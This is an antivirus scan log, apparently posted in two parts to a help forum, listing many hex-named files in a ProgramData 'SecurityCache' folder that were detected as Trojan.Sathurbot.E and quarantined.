Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\25856f397a70bac6d97a0590bb1daf27, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\2589dfd756006a29a162ca3059761bd6, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\26ba1fe505f5eb72eb8b08b07b9d2633, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\26def096d365a8ee4277c5319f81ab58, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\28d94aa8445f8afba3336edb1c27b14c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\85524c5aa24a5a95e16b6e1c4cff571d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\8758a28d48ed0a7839dc483fbd6f7129, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\88f798ca90cbd3179f8c504a8fd6a1af, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\8a1156fd41d78cd113ac0549e754baa2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\8afb95ef0d1220d23b9623bffcb9ff57, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\8b609eedd6bb25c595cd09546420db93, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\8da3583b712916b4cac4f9f3f02fdaeb, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\9090ad3a074b1da3fdf2b2aab969e097, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\915c0ea71bd2103634fb93120059f2d0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\920c265457f24c84dad5cc6f91f841e4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c5e7172ccbca5ee12ccec8dbfbb0a916, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c7db0c3f907b23bfa8df0829534cc38e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\ca5e0d1ed3240ff21f1ae59191855325, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\cc245c8e4392379c24dc19aa1df88b76, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\cc6b0cf1d835f721d67b8e62a3e764e5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\cddb6acc16ff9137398363bbe03263de, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\ce09e7ac485e61a20d82d8fa43a506a3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\cfe2d42980cc06cdf0bbfd4e6960915b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\d031285af48b90962abac2afc48200b5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\d04cb8eb0f0b9d030a0eae397e515d1a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\d1a43a55c3bda34650bb9294a135abc2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\d1eb47beb4f311fd481d357ab3456b07, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\d2bed49e2a2d86016d8993a01ab552d5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6794318076f8df2ddbbdd4ff7927f10a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\67dedcd9029bac22b3f63083e26a814f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\681d1c56fefdf5064964d65ffe5a6be3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\682b108f4d7b74c1ad51b38ce08dcd5e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\691fcacc02bc1047e58a2e80d2739b75, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\696acdc18471bad4e7424cb0996099cc, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\69e3c3a6e946adc33bfe8c0e961954a2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6a261f1464cdce0b33f8f4ecd1d1ddd4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6a3c00af9c87188194351bfb60e888a9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6a50c4bc3eadcd483eedf1b30935e613, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6c5cb2fc9f84db9de134598a02912f6e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6cf1a4221dc6831c0b264d2888c75720, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6d6351fb46b5fe461f13a94f6cb339ea, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6dbdd2e5f83e8cca4603bb59843899d5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6e994f8d30ada5c4aed6d24b44b537ca, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\74b666ebf6a455763d405af8b4d798a7, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\3c1422ca03ba9542755cb7e8fd271330, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\3c9e79246325a3d103cd13657e07eb39, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\3cd8f1ad7174b0259114330ea573eb2c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\3fd3c85733e1d00b4a694b5d187b6474, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\423156f65de615cf4d01c2c42eb03db1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\437b623652da5458a6c67b00c53868f5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\44c20a4c35790e24de6161561fdbb077, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\4678b4edab6ca6b6701cf31cf9568704, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\46d4977b73223dab65141204322efc51, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\ed39a6eb8cb42d567573ebdb6ca27c61, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\f132b912ea3f8097762b256293a9953a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\f35e906c7e6c3b68f0285005195eec52, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\f751683de03ade9e0920b62cc8542e6e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\f7bcab5dace78283b9f759005152de8d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\f86dbdd379fae926a612a144d5ecce69, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\f97beeb0ed48210ef8858bff00bb7d18, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\f9b5675e6579d5e98b41312ae6345199, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\fa22a82b1df7b08df25803806bd9694f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\faaee814b82c2a36f06e40af075cb5c1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\fc7160b2565bdcc8382fa74e43495799, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\fd2c8238c0e8ea5bd3ea58d9470224f5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\fe75751f0e65f636df55620338ed3cd1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\fe9fbb1ce8e35f5400c89d9ce9f5db14, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\fefdd2265913197c649c88a119955d59, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\941762a0c5862a72a0aa2c1995d754f8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\95c9e8535d09b813fef20e7d0a371b31, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\95e95d42d69637efd05a05d594525553, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\965c44f802aeda450496a2811908ddbb, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\98aa80db2acbfe37a9f978c6b6c0920a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\9a1ed8766c859a2a21ff3cba26f0b166, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\9bba2f1e69982976340996427e7778a0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\9eb5b6e6ae69e3bc13cc76f94dd6fded, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\a1950e3528b0871ee6f1e0891096f785, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\a544aaf5c59dbfc473ac2e3ad7274d53, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\a5825cb12a9a21ab824c133c72022a90, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\183fb8947af66b4e00cfe938ccb4b40c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\18927ccfded0d0bce2c25484315d2550, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\1bf8ddd876682be4149bc49e2386fa37, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\1ca0d14fa7448c8f80cd2be26548ab3d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\1d3257c5e4c8f8afa1263428ef788e06, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\1e96dc0081d605db4607f655335d70f8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\1f11c252718b0dceea8f4e6def7fbe79, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\20cf9543585b13f565de6ba5ba81b1fa, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c1e5440a8ad280d66ce37cd683132035, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c2515841ede50ad5241889b3a5239af1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c2ca803de5ea15aebc24dfb31e46ff88, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c3334816313242fc3a4fcc7650a14d9d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c35c62bbfd5815621772ca046abafe5e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c3b439f57d05edb948574b50b8fa59fb, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c3b69c6a946666dd8ca776ad800ff836, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\c4fcb2f1b6686cd04f82bcf02314f6ae, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7dee4e623d06c82f12da1b32d739e055, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7e8f4bb2dce979fd6160cd928709b045, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7f57ffcf705c68eb438cc6f35c7cc0a6, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\7f8f40c8cecb5de0ae30e927174121d3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\80314d336e5581f4825c25bafd0b2f67, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\8071b2e0bda3117347f54c0380caa9be, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\82f6e91ee379a279953b0f5cc542f6b0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\830a7e836dc5f626f298ba8f5f4ef5ab, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\83ae0e7e209219becd1e7bb3057b4a11, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\8518a46f9fcad1ca962b282ae0145c40, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\2abc6f3e0a5236dc6f62668ff5bc4e33, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\2af68deceeb5865b945c578b9ee63cc4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\2c7c602718049c67e933ffa40e5da42e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\2f1e4664911cc42c367ca2875ddb2ff9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\330e3d5b4ae8d0b769873c425c01c913, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\3367a180a64bb4b31da2d6965f49c613, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\345dbb1e10eb304f47c293bbd8b06e5d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\350faf47d3ddd37a10d22bd00961ec33, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\389bded36d89adf971ebc258373fa5cf, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\46f944387ed36384118d8623f6e1531b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\483c4d526d59228c7d0d68d085fbe81a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\492f2347112f091a4eb2e43788498cad, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\4b468578921d69825db9f3c80678664b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\4c7fc889b07f3fae40526a7f39ac34dd, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\4cfccf2b7ab56112367e4add655165ed, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\4d26033c23c5eb763dc97044da803b3f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\52103c6d72a58fcc5177ba768e10d13a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\52a38425d712166eee12e8bf380ea984, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\e099fdbf84410511c0f424d389fc60a2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\e112b9581d3d5ba2651112319eb4672d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\e1d3d7b0d3d53ad7a58fc9ae1a7d7fb9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\e2d766817600073df74c0cf6b0b61496, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\e78ef53bd32609839d2737d2ecc0cf01, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\e99153e73fac59432bc922fff075bc0f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\e9f653c8aa546072140276f9706f7792, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\eb44cb5d0f487dc8aab2f8d517ff7536, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\5d8a4e35087c99336bdd7ac68d24e6d0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\5e1b9e8970a28f28e6a2991c1a12a3e2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\60e5bb6744a7342441c49a380d3eed3b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\63cbf76f3e3cf9d4a2df1e524d6b21ec, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\64a5e5ce5691ea61f806e4f0816da6a8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\65b917aee136d34b3beecc082ae85412, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\661b0595c94df273a12dd98fdc0668d5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\667cf4fefa31563c464ffd08433c8d97, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\rules\6754cfecae61493964516786e862034a, Quarantined, [2851], [355073],1.0.1064

...and the second part

 

Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\02b08cc11c5281e6d56d75c3e5ec6f6f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\046134dc081d4e4bd60228d94b4a07ad, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\06a0c344dcc4ebb5d62009a224e61685, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\06acf43cdbcc688223b6bd2ac8dda023, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\0a0c265a8fe0019c50ef44989aad9f4c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\0a3b52a14ec94499246e603d7c967daf, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\0be17d8f6bd1655f15541dd32c994fd8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\0c562f6570fa8511b5aff91dae1df22f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\0eeef81f31c54974191c3180e7c559b8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\0f9a9a82cbd1c7ca7783d2700bdbd06b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\144aaba2a6a3a7024a71ade8f80dec76, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\14aafd8e07a9d2946637c94ef37d7480, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\169a3337025eed0ae46ef21ac9f029da, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\75fe5ecb00a0dcdcb2ebb33eeeafdb14, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\766ea216db4e132842f5f88dff5f4102, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\76aab28808169629449f7b5b28dd1832, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\77711852ea1271f21e48fd93d6b460ed, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7845b238fba0d738febc6b8d75a76b19, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\785926353aace0cc149794b21ccc8c18, Quarantined, [2851], [355073],1.0.1064
